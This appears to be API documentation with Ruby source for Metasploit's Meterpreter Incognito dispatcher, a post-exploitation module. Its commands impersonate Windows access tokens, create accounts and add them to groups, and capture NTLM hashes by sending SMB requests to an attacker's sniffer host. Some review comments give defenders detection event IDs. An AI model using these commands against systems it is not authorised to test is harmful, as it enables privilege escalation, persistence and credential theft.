Class: Rex::Post::Meterpreter::Ui::Console::CommandDispatcher::Incognito
Overview
Privilege escalation extension user interface.
Constant Summary
- Klass =
Console::CommandDispatcher::Incognito
- @@add_user_opts =
Rex::Parser::Arguments.new(
"-h" => [ true, "Add user to remote host" ])
- @@add_localgroup_user_opts =
Rex::Parser::Arguments.new(
"-h" => [ true, "Add user to local group on remote host" ])
- @@add_group_user_opts =
Rex::Parser::Arguments.new(
"-h" => [ true, "Add user to global group on remote host" ])
- @@list_tokens_opts =
Rex::Parser::Arguments.new(
"-u" => [ false, "List tokens by unique username" ],
"-g" => [ false, "List tokens by unique groupname" ])
Instance Attribute Summary
#shell, #tab_complete_items
Instance Method Summary
check_hash, #client, #log_error, #msf_loaded?, set_hash
#cmd_help, #cmd_help_help, #cmd_help_tabs, #deprecated_cmd, #deprecated_commands, #deprecated_help, #help_to_s, #print, #print_error, #print_good, #print_line, #print_status, #print_warning, #tab_complete_filenames, #update_prompt
Constructor Details
#initialize(shell) ⇒ Incognito
Initializes an instance of the priv command interaction.
# File 'lib/rex/post/meterpreter/ui/console/command_dispatcher/incognito.rb', line 23
# Builds the dispatcher; all setup is done by the parent class initializer.
#
# @param shell [Object] the console shell this dispatcher is attached to
def initialize(shell)
  super(shell)
end
Instance Method Details
#cmd_add_group_user(*args) ⇒ Object
# File 'lib/rex/post/meterpreter/ui/console/command_dispatcher/incognito.rb', line 177
# Console command: asks the incognito extension to add a user to a global
# group, forwarding to client.incognito.incognito_add_group_user and echoing
# whatever text it returns.
#
# Prints usage and returns nil when fewer than two arguments are supplied.
#
# NOTE(review): the group and user names are read from args[0] and args[1]
# of the raw argument list, so a leading "-h <host>" would be taken as the
# names -- presumably why the usage text puts [options] last; confirm
# against Rex::Parser::Arguments#parse.
# NOTE(review): for defenders, a member being added to a security-enabled
# global group is typically recorded as Windows Security event 4728 where
# group-management auditing is enabled.
#
# @param args [Array<String>] <groupname> <username> [-h host]
# @return [true, nil] true after the request was issued, nil on the usage path
def cmd_add_group_user(*args)
  target_host = "127.0.0.1"
  @@add_group_user_opts.parse(args) do |opt, _idx, val|
    target_host = val if opt == "-h"
  end

  if args.length < 2
    print_line("Usage: add_group_user <groupname> <username> [options]\n")
    print_line("Attempts to add a user to a global group on a host with all accessible tokens. Terminates when successful, an error that is not access denied occurs (e.g. user not found) or when all tokens are exhausted")
    print_line(@@add_group_user_opts.usage)
    return
  end

  # Only warns; the command proceeds whatever the current uid is.
  system_privilege_check

  groupname, username = args
  response = client.incognito.incognito_add_group_user(target_host, groupname, username)
  response.each_line { |line| print(line) }

  true
end
#cmd_add_localgroup_user(*args) ⇒ Object
# File 'lib/rex/post/meterpreter/ui/console/command_dispatcher/incognito.rb', line 147
# Console command: asks the incognito extension to add a user to a local
# group, forwarding to client.incognito.incognito_add_localgroup_user and
# echoing whatever text it returns.
#
# Prints usage and returns nil when fewer than two arguments are supplied.
#
# NOTE(review): the group and user names are read from args[0] and args[1]
# of the raw argument list, so a leading "-h <host>" would be taken as the
# names -- presumably why the usage text puts [options] last; confirm
# against Rex::Parser::Arguments#parse.
# NOTE(review): for defenders, a member being added to a security-enabled
# local group is typically recorded as Windows Security event 4732 where
# group-management auditing is enabled.
#
# @param args [Array<String>] <groupname> <username> [-h host]
# @return [true, nil] true after the request was issued, nil on the usage path
def cmd_add_localgroup_user(*args)
  target_host = "127.0.0.1"
  @@add_localgroup_user_opts.parse(args) do |opt, _idx, val|
    target_host = val if opt == "-h"
  end

  if args.length < 2
    print_line("Usage: add_localgroup_user <groupname> <username> [options]\n")
    print_line("Attempts to add a user to a local group on a host with all accessible tokens. Terminates when successful, an error that is not access denied occurs (e.g. user not found) or when all tokens are exhausted")
    print_line(@@add_localgroup_user_opts.usage)
    return
  end

  # Only warns; the command proceeds whatever the current uid is.
  system_privilege_check

  groupname, username = args
  response = client.incognito.incognito_add_localgroup_user(target_host, groupname, username)
  response.each_line { |line| print(line) }

  true
end
#cmd_add_user(*args) ⇒ Object
# File 'lib/rex/post/meterpreter/ui/console/command_dispatcher/incognito.rb', line 117
# Console command: asks the incognito extension to create a user account,
# forwarding to client.incognito.incognito_add_user and echoing whatever
# text it returns.
#
# Prints usage and returns nil when fewer than two arguments are supplied.
#
# NOTE(review): the user name and password are read from args[0] and args[1]
# of the raw argument list, so a leading "-h <host>" would be taken as the
# credentials -- presumably why the usage text puts [options] last; confirm
# against Rex::Parser::Arguments#parse.
# NOTE(review): for defenders, account creation is typically recorded as
# Windows Security event 4720 where user-account-management auditing is
# enabled.
#
# @param args [Array<String>] <username> <password> [-h host]
# @return [true, nil] true after the request was issued, nil on the usage path
def cmd_add_user(*args)
  target_host = "127.0.0.1"
  @@add_user_opts.parse(args) do |opt, _idx, val|
    target_host = val if opt == "-h"
  end

  if args.length < 2
    print_line("Usage: add_user <username> <password> [options]\n")
    print_line("Attempts to add a user to a host with all accessible tokens. Terminates when successful, an error that is not access denied occurs (e.g. password does not meet complexity requirements) or when all tokens are exhausted")
    print_line(@@add_user_opts.usage)
    return
  end

  # Only warns; the command proceeds whatever the current uid is.
  system_privilege_check

  username, password = args
  response = client.incognito.incognito_add_user(target_host, username, password)
  response.each_line { |line| print(line) }

  true
end
#cmd_impersonate_token(*args) ⇒ Object
# File 'lib/rex/post/meterpreter/ui/console/command_dispatcher/incognito.rb', line 99
# Console command: passes the first argument to
# client.incognito.incognito_impersonate_token and echoes the text it
# returns, line by line.
#
# With no arguments it prints the usage text and hints, then returns nil.
# Arguments after the first are ignored.
#
# @param args [Array<String>] <token>
# @return [true, nil] true after the request was issued, nil on the usage path
def cmd_impersonate_token(*args)
  if args.empty?
    print_line("Usage: impersonate_token <token>\n")
    print_line("Instructs the meterpreter thread to impersonate the specified token. All other actions will then be made in the context of that token.\n")
    print_line("Hint: Double backslash DOMAIN\\\\name (meterpreter quirk)")
    print_line("Hint: Enclose with quotation marks if name contains a space\n")
    return
  end

  # Only warns; the command proceeds whatever the current uid is.
  system_privilege_check

  token_name = args[0]
  reply = client.incognito.incognito_impersonate_token(token_name)
  reply.each_line do |line|
    print(line)
  end

  true
end
#cmd_list_tokens(*args) ⇒ Object
# File 'lib/rex/post/meterpreter/ui/console/command_dispatcher/incognito.rb', line 55
# Console command: fetches the token listing from
# client.incognito.incognito_list_tokens and prints its 'delegation' and
# 'impersonation' entries under separate headings.
#
# The ordering argument sent to the extension is 0 for "-u" and 1 for "-g";
# when both flags are given the one parsed last wins. With neither flag the
# usage text is printed and nil is returned.
#
# @param args [Array<String>] "-u" or "-g"
# @return [true, nil] true after the listing was printed, nil on the usage path
def cmd_list_tokens(*args)
  order = -1
  @@list_tokens_opts.parse(args) do |opt, _idx, _val|
    order = 0 if opt == "-u"
    order = 1 if opt == "-g"
  end

  if order == -1
    print_line("Usage: list_tokens <list_order_option>\n")
    print_line("Lists all accessible tokens and their privilege level")
    print_line(@@list_tokens_opts.usage)
    return
  end

  # Only warns; the command proceeds whatever the current uid is.
  system_privilege_check

  tokens = client.incognito.incognito_list_tokens(order)

  sections = [
    ["Delegation Tokens Available", 'delegation'],
    ["Impersonation Tokens Available", 'impersonation']
  ]
  sections.each do |heading, key|
    print_line()
    print_line(heading)
    print_line("========================================")
    tokens[key].each_line { |line| print(line) }
  end
  print_line()

  true
end
#cmd_snarf_hashes(*args) ⇒ Object
# File 'lib/rex/post/meterpreter/ui/console/command_dispatcher/incognito.rb', line 207
# Console command: hands the first argument (the sniffer host) to
# client.incognito.incognito_snarf_hashes, printing a status line before and
# after the call. The call's return value is not inspected or printed.
#
# With no arguments it prints the usage text and returns nil.
#
# NOTE(review): for defenders, the usage text describes SMB requests made
# from the session's host to the supplied peer, so this presumably appears
# as outbound SMB authentication toward an unfamiliar host; restricting
# outbound SMB at the network edge limits it.
#
# @param args [Array<String>] <sniffer_host>
# @return [true, nil] true after the call completed, nil on the usage path
def cmd_snarf_hashes(*args)
  if args.empty?
    print_line("Usage: snarf_hashes <sniffer_host>\n")
    print_line("Captures LANMAN/NTLM challenge response hashes by making SMB requests to the supplied sniffing host with every accessible token.\n")
    return
  end

  # Only warns; the command proceeds whatever the current uid is.
  system_privilege_check

  sniffer_host = args[0]
  print_line("[*] Snarfing token hashes...")
  client.incognito.incognito_snarf_hashes(sniffer_host)
  print_line("[*] Done. Check sniffer logs")

  true
end
#commands ⇒ Object
List of supported commands.
# File 'lib/rex/post/meterpreter/ui/console/command_dispatcher/incognito.rb', line 30
# Maps each console command name this dispatcher offers to its one-line
# help text. A new Hash is built on every call.
#
# @return [Hash{String => String}] command name => description
def commands
  [
    ["add_user", "Attempt to add a user with all tokens"],
    ["add_localgroup_user", "Attempt to add a user to a local group with all tokens"],
    ["add_group_user", "Attempt to add a user to a global group with all tokens"],
    ["list_tokens", "List tokens available under current user context"],
    ["impersonate_token", "Impersonate specified token"],
    ["snarf_hashes", "Snarf challenge/response hashes for every token"]
  ].to_h
end
#name ⇒ Object
# File 'lib/rex/post/meterpreter/ui/console/command_dispatcher/incognito.rb', line 233
# Display name of this command dispatcher.
#
# @return [String] always "Incognito"
def name
  'Incognito'
end
#system_privilege_check ⇒ Object
# File 'lib/rex/post/meterpreter/ui/console/command_dispatcher/incognito.rb', line 223
# Prints a two-line warning when the session's uid, as reported by
# client.sys.config.getuid, is not exactly "NT AUTHORITY\\SYSTEM".
#
# This is advisory only: nothing is raised and no status is returned for
# callers to act on, so the calling command continues either way.
#
# NOTE(review): the comparison is an exact string match, so a SYSTEM account
# reported under a localized name would presumably trigger the warning --
# confirm against what getuid returns.
def system_privilege_check
  current_uid = client.sys.config.getuid
  return if current_uid == "NT AUTHORITY\\SYSTEM"

  print_line("[-] Warning: Not currently running as SYSTEM, not all tokens will be available")
  print_line(" Call rev2self if primary process token is SYSTEM")
end